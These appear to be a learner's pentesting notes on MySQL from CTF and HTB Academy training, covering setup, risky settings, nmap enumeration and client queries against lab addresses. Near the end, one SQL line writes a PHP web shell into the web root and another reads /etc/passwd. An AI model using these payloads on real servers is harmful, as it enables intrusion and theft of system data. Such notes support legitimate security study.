MYSQL

Source CTF and HTB Academy

  • Usually on port 3306

MySQL is an open-source SQL relational database management system developed and supported by Oracle. A database is simply a structured collection of data organized for easy use and retrieval. The database system can quickly process large amounts of data with high performance.

  • sudo apt install mysql-server -y install mysql server

  • On Parrot I had to

    • sudo apt install mariadb-client

    • sudo apt install mariadb-server

SQL language

Default Configuration

  • cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | sed -r '/^\s*$/d'

Dangerous Settings

Settings
Description

user

Sets which user the MySQL service will run as.

password

Sets the password for the MySQL user.

admin_address

The IP address on which to listen for TCP/IP connections on the administrative network interface.

debug

This variable indicates the current debugging settings

sql_warnings

This variable controls whether single-row INSERT statements produce an information string if warnings occur.

secure_file_priv

This variable is used to limit the effect of data import and export operations.

Enumeration

Nmap

  • sudo nmap 10.129.14.128 -sV -sC -p3306 --script mysql*

Interaction with the server

  • mysql -u root -h 10.129.14.132

  • mysql -u root -pP4SSw0rd -h 10.129.14.128

  • show databases; list databases

  • select version(); show the version

  • use <database>; select a database

  • show tables; list the tables

  • show columns from <table>;

  • select * from <table>;

  • select * from <table> where <column> = "<string>"; Example:select host, unique_users from host_summary;

  • SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php'; write local files

  • select LOAD_FILE("/etc/passwd"); read local files

Last updated